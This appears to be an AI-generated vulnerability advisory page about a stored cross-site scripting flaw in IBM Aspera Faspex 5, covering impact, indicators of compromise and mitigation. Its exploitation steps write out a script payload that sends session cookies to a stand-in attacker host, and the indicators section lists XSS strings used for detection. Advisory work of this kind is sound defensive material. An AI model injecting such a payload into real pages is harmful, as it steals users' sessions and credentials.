CVE-2025-36226
IBM Aspera Faspex vulnerability analysis and mitigation

Overview

CVE-2025-36226 is a stored cross-site scripting (XSS) vulnerability in IBM Aspera Faspex 5, affecting versions 5.0.0 through 5.0.14.3. It allows an authenticated user to embed arbitrary JavaScript code in the Web UI, potentially leading to credentials disclosure within a trusted session. The vulnerability was published on March 10, 2026, with a patch available as of the same date. It carries a CVSS v3.1 base score of 5.4 (Medium) (IBM Advisory, Red Hat CVE).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically of the stored XSS variant. An authenticated attacker can inject malicious JavaScript into user-controllable fields within the Faspex Web UI; the injected code is then stored and later executed in the browsers of other users who view the affected content. Exploitation requires low privileges (an authenticated account) and user interaction from a victim, but operates within a changed scope — meaning the injected script can affect resources beyond the attacker's own session. No public proof-of-concept code has been identified (IBM Advisory, Red Hat CVE).

Impact

Successful exploitation could allow an attacker to steal session tokens or login credentials from other authenticated users operating within trusted sessions, effectively enabling account takeover or credential harvesting. The injected JavaScript can also modify application behavior or content displayed to victims, potentially facilitating phishing or further attacks within the Faspex environment. Confidentiality and integrity are both impacted at a low level per the CVSS assessment, while availability is not directly affected (IBM Advisory).

Exploitation steps

  1. Reconnaissance: Identify IBM Aspera Faspex 5 instances running versions 5.0.0 through 5.0.14.3 accessible via the web, using network scanning or OSINT techniques.
  2. Obtain authenticated access: Acquire a low-privileged authenticated account on the target Faspex instance (e.g., a standard user account).
  3. Identify injectable fields: Navigate the Faspex Web UI to locate user-controllable input fields (such as package descriptions, notes, or profile fields) that are rendered to other users without proper output encoding.
  4. Inject malicious payload: Submit a crafted stored XSS payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into the vulnerable field.
  5. Trigger victim execution: Wait for or socially engineer another authenticated user (e.g., an administrator) to view the page containing the injected content, causing their browser to execute the malicious JavaScript.
  6. Harvest credentials or tokens: The executed script exfiltrates session cookies, credentials, or other sensitive data to an attacker-controlled server, enabling session hijacking or credential theft (IBM Advisory).

Indicators of compromise

  • Logs: Web application access logs showing unusual or encoded JavaScript strings (e.g., <script>, onerror=, javascript:) in POST request bodies to Faspex input endpoints; repeated requests from a single low-privileged account submitting content with script tags.
  • Network: Outbound HTTP/S requests from user browsers to unexpected external domains shortly after accessing Faspex pages, potentially carrying cookie or credential data as query parameters.
  • Application Behavior: Unexpected redirects or pop-ups appearing within the Faspex Web UI for users viewing specific packages or content items; users reporting altered UI behavior or unexpected logouts.

Mitigation and workarounds

IBM has released version 5.0.15 of Aspera Faspex 5 to address this vulnerability; all users running versions 5.0.0 through 5.0.14.3 should upgrade immediately (IBM Advisory). As interim mitigations, administrators should implement Content Security Policy (CSP) headers to limit the impact of any XSS, enforce strict input validation and output encoding on the server side, and restrict access to the Faspex Web UI to trusted networks where possible. Monitor application logs for suspicious JavaScript injection attempts in user-controllable fields.

Additional resources


SourceThis report was generated using AI

Related IBM Aspera Faspex vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2025-36227MEDIUM5.4
  • IBM Aspera Faspex logoIBM Aspera Faspex
  • cpe:2.3:a:ibm:aspera_faspex
NoYesMar 10, 2026
CVE-2025-36226MEDIUM5.4
  • IBM Aspera Faspex logoIBM Aspera Faspex
  • cpe:2.3:a:ibm:aspera_faspex
NoYesMar 10, 2026
CVE-2025-36230MEDIUM5.4
  • IBM Aspera Faspex logoIBM Aspera Faspex
  • cpe:2.3:a:ibm:aspera_faspex
NoYesDec 26, 2025
CVE-2025-36229MEDIUM4.3
  • IBM Aspera Faspex logoIBM Aspera Faspex
  • cpe:2.3:a:ibm:aspera_faspex
NoYesDec 26, 2025
CVE-2025-36228LOW3.8
  • IBM Aspera Faspex logoIBM Aspera Faspex
  • cpe:2.3:a:ibm:aspera_faspex
NoYesDec 26, 2025

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management